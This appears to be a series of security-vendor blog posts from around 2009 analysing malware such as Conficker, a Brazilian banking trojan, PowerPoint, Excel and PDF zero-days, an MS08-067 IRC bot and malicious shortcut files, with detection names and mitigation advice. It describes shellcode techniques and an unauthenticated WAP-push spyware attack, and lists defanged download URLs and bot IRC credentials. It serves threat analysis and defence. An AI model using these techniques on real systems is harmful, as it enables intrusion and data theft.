I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. And, yes, we already detect this malware–as PWS-Banker.gen.i.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Supervisory Control and Data Acquisition, or SCADA, stands for large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

Stories about intruders who damage the power grid or any other key SCADA infrastructure frequently make the headlines. In the past, and like in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

Since then, our enemies have changed. The Wall Street Journal reported in April that a federal audit of critical infrastructure facilities in the U.S. power industry had been compromised with software that would allow the attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a U.S. senior intelligence official said on the occasion. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

Last week, I discovered a video posted on YouTube in November 2008.
We can see two guys hacking a central light system and then playing space invaders on it!

I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have got their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed under less secure operating systems (Windows), are connected to other networks (including Internet), and cannot be easily updated and rebooted.

For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.

RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

For those who were not among the annointed and attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendez-vous to start its latest escapade. In this case, the infected host will be contacted initially by another host over an ad-hoc P2P connection. Kind of like an alarm clock. Then, after hitting the snooze button over a period of several hours, the communication begins again - starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka update) may go unseen - or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch - so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as - Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. - Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves a HTTP rendez-vous domain name, it compares the IP resolved with the list of IPs it already queried, if the new IP is in the list, it will move on to the next domain in its list.

Of course, we will update if anything else comes along…

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY  since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint Zero-Day exploits that once again are used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, yet unpatched hole in Microsoft PowerPoint and causes it to execute code infiltrated by the attackers. This blog post shows how the shellcode works and what it does, right after an innocent victim opens the malicious file - if the attacker gets their way of course!

For size reasons, the code is split up into several parts that are scattered among the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to relocate the remaining part of the shellcode in memory. In order to do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (which is a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transfered to the code following it.

Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0×30000000). Another loop then XOR decodes another part of the shellcode into that memory location and branches to it. Once decoded, a filename (”fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are going to be imported by parsing OS internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

As shellcode mostly needs to fit into a size-limited block of memory, this piece of exploit not only has its code split into several parts for it to work reliably, it also uses 32bit hashes of API functions to import, rather than a list of respective function names which would consume more space. The shellcode’s ROR-13 hashing algorithm iterates over any exported API function name and compares it against its given list at run-time. Applying the same technique when statically analyzing shellcode, the list of imported functions becomes readable. Looking at the now readable list, it does not contain any function which would indicate the shellcode to download a file but rather drop an embedded one from the PowerPoint file and execute it.

Using a hex-search for typical indicators of an executable file, such as an “MZ” or “PE” header doesn’t yield any feasible results - which is not astonishing at all. Of course, the attackers responsible for having built the exploit intended to prevent their cover being blown by something as obvious as an executable that is embedded into a PowerPoint presentation file! By looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

The loop decrypts a given memory block using an 8bit XOR key. By incorporating the same decryption-loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ- and PE header surface in the hex editor. It’s the embedded executable that was assumed to hide between the PowerPoint “slides” - the malware can finally be extracted.

McAfee VirusScan products detect this threat as Exploit-PPT.k trojan, McAfee Anti-Malware Gateway Edition (former Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe.  It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as Generic Rootkit.g trojan.  It then follows to establish an outbound connection with a remote IRC server using following credentials:

• PASS h4xg4ng
• NICK [00-USA-XP-9215671]
• USER SP2-ojd, followed by the name of the infected computer.

This worm exploits the MS08-067 vulnerability indeed, and uses a download-and-execute shellcode which behaves in an identical fashion as Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode which loads API libraries (i.e. urlmon.dll) and executes URLDownloadToFile() to download malware from already infected systems into new targets. Unlike Conficker which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself.  The Metasploit framework has become a popular platform for security tools development and automation. As we can see, the latest version of Metasploit is not only used by whitehatsfor vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is not an exception, it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as dcerpc service connection testing code located in the “client.rb” module. By using these routines,  new worm can conveniently determine which operating system and service pack it is targeting to achieve a better infection success rate. The way how W32/IRCbot.gen.a ordered the attack packets is identical to Metasploit’s MS08-067 module  (ms08_067_netapi.rb):

Both Conficker and W32/IRCbot.gen.a uses open source tools similarly to their advantage to make their work much easier.

We went on to investigate additional sites where the worm is connecting to and the payload that it is trying to download. Packet sniffer logs shows that it accesses at least two other remote servers:

• hxxp://98.1[infected].42:443/n
• hxxp://74.2[infected].90:88/jueo.exe

While the first server is not showing any technical activity at the time of research, the second server is still active and hosts additional malware that is installed into infected machines:

Well, hello Donbot ! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C) detected generically as Generic.dx appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet . While other botnets - namely Cutwail and Rustock continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets as they might not get another chance like the MS08-067 exploit in a long time.

This would also serve as yet another reminder that there could well be many computers on the Internet that are still not installed with the latest security updates - more than 5 months since the release of the MS08-067 patch.

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detects this threat as Exploit-PPT.k trojan using the 5573 DATs to be released on the same day. 

As with most other document exploits, these PowerPoint files install malicious trojans in the background but displays an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

• fssm32.exe: 428,032 bytes (Muster.c trojan)
• IEUpd.exe : 45,056 bytes (Muster.c trojan)
• setup.exe : 13, 1072 bytes (Muster.c trojan)
• PeerCM.exe : 80,666 bytes (Generic BackDoor.u trojan)
• ws2_42.dll :10,6740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Showfiles with the “.pps” extension. Such files typically opens in full screen mode and hides the  applications running on the desktop such as system monitoring tools that could give any clue to the dodgy installation of trojans to the victim.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

Everyday there are thousands of websites that have been injected with malicious code and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, and its features are easy-to-use, as well as free. Multiple buffer overflow in Baofeng2 Storm allow for the downloading and execution of files. CVE Number is CVE-2007-4816.
Reference:
http://www.baofeng.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. CVE Number is CVE-2007-4105.
Reference:
http://bar.baidu.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great deal of customers. Buffer overflows in Xunlei Web before version 5.6.3.44 can execute arbitrary code with the vulnerability. CVE Number is CVE-2007-5064.
Reference:
http://dl.xunlei.com/index.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software base on p2p streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-4748.
Reference:
http://www.ppstream.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a kind of free game. It is a gaming platform that covers all the related fields and areas of network games. It has a category of nearly one hundred species of games, including Card games, leisure games, large-scale network and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module in the ConnectAndEnterRoom() method allows for the execution arbitrary code. Its CVE number is CVE-2007-5722.
Reference:
http://www.ourgame.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool. It’s similar to a PDF reader. Buffer overflows in the Ultra Star Reader allows for execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-5807.
Reference:
http://www.ssreader.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allows for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:
http://www.jetaudio.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as http, ftp and bit torrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:
http://www.xunlei.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms have turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.
 –

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When succesfull, it installs a backdoor that attempts to connect a remote site port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

The year 2009 has so far have a been hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspicious user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

Needless to further remind everyone, zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-087) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8,x and 9.x. In parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks, found in the field, use the infamous “HeapSpray” method via JavaScript to achieve control of code execution (see below):

In the above image, the eax register is specially crafted to point to the malicious shellcode that installs a trojan. When successful, the attack installs a backdoor to enforce remote control and monitoring on infected systems. Further characteristics of this backdor and detection details are posted at http://vil.nai.com/vil/content/v_153842.htm

While the distribution of this exploit thus far appears to be targeted, new variants are expected as more information is made public. As with the Conficker experience, the lack of good patch management is a very worrying trend that deserves more attention from IT security practitioners. Adobe is expected to release a patch very soon:

http://www.adobe.com/support/security/advisories/apsa09-01.html

An exploit found to be targeting a recently patched vulnerability for Internet Explorer 7 was discovered in-the-wild.  Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical with the possibility of a consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using word documents, we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This word document contains an embedded ActiveX control which upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Recently I bought a new cell phone: the HTC Touch Pro. Great mobile phone. Opera Mobile Web surfing is handled great. The Sprint EV-DO Rev A network is fast and it’s the most stable smart phone I’ve had so far. As a security researcher naturally I had to dig deeper into how secure this mobile phone actually is. I quickly found out things that make me wonder if the mobile handset industry has learned anything from the desktop industry as far as protecting consumers.

The first thing I did was look at the default security settings of the mobile phone. Microsoft mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. These policies are also documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx along with the recommended settings to use as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone are, by default, different from the recommended settings. Below is the analysis on two of these changed policy settings:

SL Message Policy
Recommended Default: 2048 - SECROLE_PPG_TRUSTED
Value on HTC Touch Pro: 0000100c: 2112
Changed Value: (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

SI Message Policy
Recommended Default: 3072 - (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 0000100d: 3136
Changed Value: (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

These policy settings define WAP Push SI (Service Indication) and SL (Service Load). WAP was designed to be used by operators, administrators, and others to push software updates or even ringtones directly to the phone. For some unknown reason the HTC Touch Pro has broken from the recommended security policy and added a flag (SECROLE_USER_UNAUTH) that allows unauthenticated WAP Pushes from anyone. What does this mean? It means that an attacker can send a WAP push telling you to install spyware, like FlexiSpy, which gives them full control of your mobile handset. Once installed, the attacker can obtain your private data, your passwords, call logs, and even eavesdrop using the microphone. Sound familiar? And don’t think that it has to be a WAP push with a WAP gateway etc. That’s not the only impact these settings have. A specially crafted SMS can have the same effect as sending the WAP push through a gateway. A binary SMS message can contain a WAP SL Push (using SL as it can be used to force the downloading of spyware without user intervention or prompts) that instructs the mobile handset to go to a specific URL, get the spyware, and run the spyware after receiving it. In this case, all the attacker would need is the mobile handset phone number to send the binary SMS message to.

Further research showed that binary SMS doesn’t seem to work on Sprint’s CDMA network. Although, it is reported it does work on GSM networks such as AT&T. This makes me wonder what the default security policy is for WAP Pushes on AT&T’s version of the HTC Pro Touch, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies to the Microsoft recommended default value of 2048 and 3072 respectively. I use PHM Registry Editor although any registry editor for Windows Mobile can be used.

Shortcuts, or LNK files, are small binary files which have the path to an applications, sometimes with optional parameters. These files are used for running applications and are placed on folders where they are easy to access by users on such places as Desktops, and Application Launchers. The LNK files are also placed within the Startup folder to run automatically upon system boot. This indirect way of running applications is often attractive to malware authors as shortcuts have not been called out to most user’s attention for the sake of security as much as executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files/scripts in several different ways. Here, we introduce some methods we have recently seen:

1. Create shortcut files linking to malware files

This is an easy way to launch malware by a user’s actions or upon system reboot. These LNK files are created on the desktop, network shares, and even startup folders. One of the many variants of the Spy-Agent.bw trojan are known to take advantage of shortcuts to run.

2. Parasitic Infection to shortcuts

We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file to the original path.



The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs as well as executing the original file, all while running in the background. Ultimately users only see the application which was associated with the shortcut launch, thereby making it much harder for users to notice the infection.

3. Scripts in the shortcuts

Shortcuts can often contain scripts for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.



When users click on these LNK files, the scripts silently creates and drops ftp scripts to then download vbs scripts from the ftp severs. The downloaded vbs scripts are then responsible for downloading trojan files.

In the first 2 cases, shortcuts are just ways of launching malware whereas in the last case, these LNK files are standalone malicious files in which no other malicious executable files are needed but a legit “cmd.exe”. This type of LNK files can be attached to emails or hosted on the web sites. This implies that we need to be more careful with LNK files. Users can easily check shortcuts by browsing the file property or viewing the file with a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
